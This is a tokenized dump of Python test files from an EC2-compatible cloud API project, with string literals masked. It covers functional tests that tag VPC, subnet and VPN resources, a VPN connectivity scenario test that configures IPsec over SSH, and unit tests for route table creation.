= subnet_id ) <EOL> self . cancelResourceCleanUp ( subnet_clean ) <EOL> self . get_subnet_waiter ( ) . wait_delete ( subnet_id ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_route_table ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> data = self . client . create_route_table ( VpcId = vpc_id ) <EOL> rt_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_route_table , <EOL> RouteTableId = rt_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_route_tables ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( rt_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( rt_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_route_table ( RouteTableId = rt_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_security_group ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> desc = data_utils . rand_name ( '<STR_LIT>' ) <EOL> data = self . client . create_security_group ( VpcId = vpc_id , <EOL> GroupName = name , <EOL> Description = desc ) <EOL> group_id = data [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_security_group , <EOL> GroupId = group_id ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_security_groups ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( group_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( group_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_security_group ( GroupId = group_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> def test_tag_snapshot ( self ) : <EOL> data = self . client . create_snapshot ( VolumeId = self . volume_id ) <EOL> snapshot_id = data [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_snapshot , <EOL> SnapshotId = snapshot_id ) <EOL> self . get_snapshot_waiter ( ) . wait_available ( snapshot_id , <EOL> final_set = ( '<STR_LIT>' ) ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_snapshots ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( snapshot_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( snapshot_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_snapshot ( SnapshotId = snapshot_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . get_snapshot_waiter ( ) . wait_delete ( snapshot_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_subnet ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_subnet ( VpcId = vpc_id , <EOL> CidrBlock = cidr ) <EOL> subnet_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_subnet , <EOL> SubnetId = subnet_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_subnets ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( subnet_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( subnet_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_subnet ( SubnetId = subnet_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . get_subnet_waiter ( ) . wait_delete ( subnet_id ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_vpc ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_vpcs ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( vpc_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( vpc_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_customer_gateway ( self ) : <EOL> data = self . client . create_customer_gateway ( <EOL> Type = '<STR_LIT>' , PublicIp = '<STR_LIT>' , BgpAsn = <NUM_LIT> ) <EOL> cgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_customer_gateway , <EOL> CustomerGatewayId = cgw_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_customer_gateways ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( cgw_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( cgw_id , '<STR_LIT>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_vpn_gateway ( self ) : <EOL> data = self . client . create_vpn_gateway ( Type = '<STR_LIT>' ) <EOL> vgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_vpn_gateway , <EOL> VpnGatewayId = vgw_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_vpn_gateways ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( vgw_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( vgw_id , '<STR_LIT>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_vpn_connection ( self ) : <EOL> data = self . client . create_customer_gateway ( <EOL> Type = '<STR_LIT>' , PublicIp = '<STR_LIT>' , BgpAsn = <NUM_LIT> ) <EOL> cgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_customer_gateway , <EOL> CustomerGatewayId = cgw_id ) <EOL> data = self . client . create_vpn_gateway ( Type = '<STR_LIT>' ) <EOL> vgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_vpn_gateway , <EOL> VpnGatewayId = vgw_id ) <EOL> data = self . client . create_vpn_connection ( <EOL> CustomerGatewayId = cgw_id , VpnGatewayId = vgw_id , <EOL> Options = { '<STR_LIT>' : True } , Type = '<STR_LIT>' ) <EOL> vpn_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> vpn_clean = self . addResourceCleanUp ( self . client . delete_vpn_connection , <EOL> VpnConnectionId = vpn_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_vpn_connections ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( vpn_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( vpn_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_vpn_connection ( VpnConnectionId = vpn_id ) <EOL> vpn_waiter = self . get_vpn_connection_waiter ( ) <EOL> self . cancelResourceCleanUp ( vpn_clean ) <EOL> vpn_waiter . wait_delete ( vpn_id ) </s>
<s> import os <EOL> import sys <EOL> import time <EOL> import urllib2 <EOL> from lxml import etree <EOL> from oslo_log import log <EOL> import paramiko <EOL> from tempest . lib . common import ssh <EOL> from tempest . lib . common . utils import data_utils <EOL> import testtools <EOL> from ec2api . tests . functional import base <EOL> from ec2api . tests . functional import config <EOL> from ec2api . tests . functional . scenario import base as scenario_base <EOL> CONF = config . CONF <EOL> LOG = log . getLogger ( __name__ ) <EOL> class VpnTest ( scenario_base . BaseScenarioTest ) : <EOL> CUSTOMER_GATEWAY_IP = '<STR_LIT>' <EOL> CUSTOMER_VPN_CIDR = '<STR_LIT>' <EOL> OPENSWAN_LINK = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ classmethod <EOL> @ base . safe_setup <EOL> def setUpClass ( cls ) : <EOL> super ( VpnTest , cls ) . setUpClass ( ) <EOL> if not base . TesterStateHolder ( ) . get_vpc_enabled ( ) : <EOL> raise cls . skipException ( '<STR_LIT>' ) <EOL> def test_vpn_routing ( self ) : <EOL> vpc_id , _subnet_id = self . create_vpc_and_subnet ( '<STR_LIT>' ) <EOL> vpn_data = self . _create_and_configure_vpn ( <EOL> vpc_id , self . CUSTOMER_GATEWAY_IP , self . CUSTOMER_VPN_CIDR ) <EOL> vgw_id = vpn_data [ '<STR_LIT>' ] <EOL> data = self . client . describe_route_tables ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ vpc_id ] } ] ) <EOL> rtb_id = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> data = self . client . describe_route_tables ( RouteTableIds = [ rtb_id ] ) <EOL> data = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> route = next ( ( r for r in data [ '<STR_LIT>' ] <EOL> if r [ '<STR_LIT>' ] == self . CUSTOMER_VPN_CIDR ) , <EOL> None ) <EOL> if route : <EOL> self . assertEqual ( '<STR_LIT>' , route [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , route [ '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertNotEmpty ( data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( vgw_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> @ testtools . skipUnless ( CONF . aws . run_ssh , '<STR_LIT>' ) <EOL> @ testtools . skipUnless ( CONF . aws . run_long_tests , '<STR_LIT>' ) <EOL> @ testtools . skipUnless ( CONF . aws . image_id_ubuntu , <EOL> "<STR_LIT>" ) <EOL> @ testtools . skipUnless ( CONF . aws . image_id , <EOL> "<STR_LIT>" ) <EOL> def test_vpn_connectivity ( self ) : <EOL> is_amazon = '<STR_LIT>' in CONF . aws . ec2_url <EOL> response = urllib2 . urlopen ( self . OPENSWAN_LINK , timeout = <NUM_LIT:30> ) <EOL> content = response . read ( ) <EOL> if not is_amazon : <EOL> filename = os . path . basename ( self . OPENSWAN_LINK ) <EOL> f = open ( filename , '<STR_LIT:w>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> key_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> pkey = self . create_key_pair ( key_name ) <EOL> sec_group_name = self . create_standard_security_group ( ) <EOL> instance_id_ubuntu = self . run_instance ( <EOL> KeyName = key_name , ImageId = CONF . aws . image_id_ubuntu , <EOL> SecurityGroups = [ sec_group_name ] ) <EOL> public_ip_ubuntu = self . get_instance_ip ( instance_id_ubuntu ) <EOL> instance = self . get_instance ( instance_id_ubuntu ) <EOL> private_ip_ubuntu = instance [ '<STR_LIT>' ] <EOL> vpc_id , subnet_id = self . create_vpc_and_subnet ( '<STR_LIT>' ) <EOL> self . prepare_vpc_default_security_group ( vpc_id ) <EOL> vpn_data = self . _create_and_configure_vpn ( <EOL> vpc_id , public_ip_ubuntu , private_ip_ubuntu + '<STR_LIT>' ) <EOL> instance_id = self . run_instance ( KeyName = key_name , <EOL> ImageId = CONF . aws . image_id , <EOL> SubnetId = subnet_id ) <EOL> instance = self . get_instance ( instance_id ) <EOL> private_ip_in_vpc = instance [ '<STR_LIT>' ] <EOL> ssh_client = ssh . Client ( public_ip_ubuntu , CONF . aws . image_user_ubuntu , <EOL> pkey = pkey ) <EOL> if not is_amazon : <EOL> self . _upload_file ( ssh_client , filename , filename ) <EOL> ssh_client . exec_command ( '<STR_LIT>' <EOL> '<STR_LIT>' + filename ) <EOL> else : <EOL> ssh_client . exec_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ssh_client . exec_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sysctl_additions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for item in sysctl_additions : <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' + item + '<STR_LIT>' ) <EOL> ssh_client . exec_command ( '<STR_LIT>' ) <EOL> ipsec_conf , ipsec_secrets = self . _get_ipsec_conf ( <EOL> vpn_data [ '<STR_LIT>' ] , private_ip_ubuntu ) <EOL> ssh_client . exec_command ( '<STR_LIT>' ) <EOL> for fstr in ipsec_conf : <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' % fstr ) <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' % ipsec_secrets ) <EOL> ssh_client . exec_command ( '<STR_LIT>' ) <EOL> try : <EOL> self . get_vpn_connection_tunnel_waiter ( ) . wait_available ( <EOL> vpn_data [ '<STR_LIT>' ] , ( '<STR_LIT>' ) ) <EOL> except Exception : <EOL> exc_info = sys . exc_info ( ) <EOL> try : <EOL> output = ssh_client . exec_command ( '<STR_LIT>' ) <EOL> LOG . warning ( output ) <EOL> except Exception : <EOL> pass <EOL> raise exc_info [ <NUM_LIT:1> ] , None , exc_info [ <NUM_LIT:2> ] <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> ssh_client . exec_command ( '<STR_LIT>' % private_ip_in_vpc ) <EOL> def _upload_file ( self , ssh_client , local_path , remote_path ) : <EOL> ssh = ssh_client . _get_ssh_connection ( ) <EOL> transport = ssh . get_transport ( ) <EOL> sftp_client = paramiko . SFTPClient . from_transport ( transport ) <EOL> sftp_client . put ( local_path , remote_path ) <EOL> def _create_and_configure_vpn ( self , vpc_id , cgw_ip , customer_subnet ) : <EOL> data = self . client . create_customer_gateway ( <EOL> Type = '<STR_LIT>' , PublicIp = cgw_ip , BgpAsn = <NUM_LIT> ) <EOL> cgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( <EOL> self . client . delete_customer_gateway , CustomerGatewayId = cgw_id ) <EOL> self . get_customer_gateway_waiter ( ) . wait_available ( cgw_id ) <EOL> data = self . client . create_vpn_gateway ( <EOL> Type = '<STR_LIT>' , AvailabilityZone = CONF . aws . aws_zone ) <EOL> vgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( <EOL> self . client . delete_vpn_gateway , VpnGatewayId = vgw_id ) <EOL> self . get_vpn_gateway_waiter ( ) . wait_available ( vgw_id ) <EOL> data = self . client . attach_vpn_gateway ( VpnGatewayId = vgw_id , <EOL> VpcId = vpc_id ) <EOL> self . addResourceCleanUp ( self . client . detach_vpn_gateway , <EOL> VpnGatewayId = vgw_id , VpcId = vpc_id ) <EOL> self . get_vpn_gateway_attachment_waiter ( ) . wait_available ( <EOL> vgw_id , '<STR_LIT>' ) <EOL> data = self . client . describe_route_tables ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ vpc_id ] } ] ) <EOL> rtb_id = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> data = self . client . enable_vgw_route_propagation ( RouteTableId = rtb_id , <EOL> GatewayId = vgw_id ) <EOL> self . addResourceCleanUp ( self . client . disable_vgw_route_propagation , <EOL> RouteTableId = rtb_id , GatewayId = vgw_id ) <EOL> data = self . client . create_vpn_connection ( <EOL> CustomerGatewayId = cgw_id , VpnGatewayId = vgw_id , <EOL> Options = { '<STR_LIT>' : True } , Type = '<STR_LIT>' ) <EOL> vpn_data = data [ '<STR_LIT>' ] <EOL> vpn_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_vpn_connection , <EOL> VpnConnectionId = vpn_id ) <EOL> self . get_vpn_connection_waiter ( ) . wait_available ( vpn_id ) <EOL> data = self . client . create_vpn_connection_route ( <EOL> VpnConnectionId = vpn_id , <EOL> DestinationCidrBlock = customer_subnet ) <EOL> self . get_vpn_connection_route_waiter ( customer_subnet ) . wait_available ( <EOL> vpn_id ) <EOL> return vpn_data <EOL> def _get_ipsec_conf ( self , vpn_connection_id , private_ip_ubuntu ) : <EOL> data = self . client . describe_vpn_connections ( <EOL> VpnConnectionIds = [ vpn_connection_id ] ) <EOL> vpn_data = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> vpn_config = etree . fromstring ( <EOL> vpn_data [ '<STR_LIT>' ] ) <EOL> psks = vpn_config . xpath ( <EOL> '<STR_LIT>' ) <EOL> self . assertNotEmpty ( psks ) <EOL> vgw_ip = vpn_config . xpath ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertTrue ( vgw_ip ) <EOL> ipsec_key = psks [ <NUM_LIT:0> ] . text <EOL> vgw_ip = vgw_ip [ <NUM_LIT:0> ] . text <EOL> ipsec_conf = [ ] <EOL> for item in self . _ipsec_conf : <EOL> ipsec_conf . append ( item % { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : vgw_ip , <EOL> '<STR_LIT>' : private_ip_ubuntu } ) <EOL> ipsec_secrets = ( '<STR_LIT>' <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT>' : private_ip_ubuntu , <EOL> '<STR_LIT>' : vgw_ip , <EOL> '<STR_LIT>' : ipsec_key } ) <EOL> return ipsec_conf , ipsec_secrets <EOL> _ipsec_conf = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] </s>
<s> import copy <EOL> import mock <EOL> from oslotest import base as test_base <EOL> from ec2api . api import common <EOL> from ec2api . api import ec2utils <EOL> from ec2api . api import route_table as route_table_api <EOL> from ec2api import exception <EOL> from ec2api . tests . unit import base <EOL> from ec2api . tests . unit import fakes <EOL> from ec2api . tests . unit import matchers <EOL> from ec2api . tests . unit import tools <EOL> class RouteTableTestCase ( base . ApiTestCase ) : <EOL> def test_route_table_create ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 ) <EOL> self . db_api . add_item . side_effect = ( <EOL> tools . get_db_api_add_item ( fakes . ID_EC2_ROUTE_TABLE_1 ) ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 } ) <EOL> self . assertThat ( <EOL> resp [ '<STR_LIT>' ] , <EOL> matchers . DictMatches ( tools . purge_dict ( fakes . EC2_ROUTE_TABLE_1 , <EOL> ( '<STR_LIT>' , ) ) ) ) <EOL> self . db_api . add_item . assert_called_once_with ( <EOL> mock . ANY , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : None } ] } ) <EOL> self . db_api . get_item_by_id . assert_called_once_with ( <EOL> mock . ANY , fakes . ID_EC2_VPC_1 ) <EOL> def test_route_table_create_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_route ( self , routes_updater ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 , fakes . DB_IGW_1 , fakes . DB_VPN_GATEWAY_1 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 ) <EOL> def do_check ( params , route_table , rollback_route_table_state , <EOL> update_target = route_table_api . HOST_TARGET ) : <EOL> resp = self . execute ( '<STR_LIT>' , params ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , route_table ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table , <EOL> update_target = update_target ) <EOL> self . db_api . update_item . reset_mock ( ) <EOL> routes_updater . reset_mock ( ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : fakes . ID_EC2_IGW_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . CIDR_EXTERNAL_NETWORK , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 } , <EOL> fakes . DB_ROUTE_TABLE_2 , fakes . DB_ROUTE_TABLE_2 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> fakes . DB_ROUTE_TABLE_2 , fakes . DB_ROUTE_TABLE_2 ) <EOL> def test_create_route_invalid_parameters ( self ) : <EOL> id_ec2_eni_vpc_2 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> eni_vpc_2 = fakes . gen_db_network_interface ( <EOL> id_ec2_eni_vpc_2 , fakes . random_os_id ( ) , <EOL> fakes . ID_EC2_VPC_2 , fakes . random_ec2_id ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> instance_id = fakes . ID_EC2_INSTANCE_2 ) <EOL> eni_2_in_instance_1 = fakes . gen_db_network_interface ( <EOL> fakes . random_ec2_id ( '<STR_LIT>' ) , fakes . random_os_id ( ) , <EOL> fakes . ID_EC2_VPC_1 , fakes . random_ec2_id ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> instance_id = fakes . ID_EC2_INSTANCE_1 ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 , eni_vpc_2 , fakes . DB_IGW_1 , fakes . DB_IGW_2 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_VPN_GATEWAY_2 ) <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( error_code , '<STR_LIT>' , params ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . IP_NETWORK_INTERFACE_1 + '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( 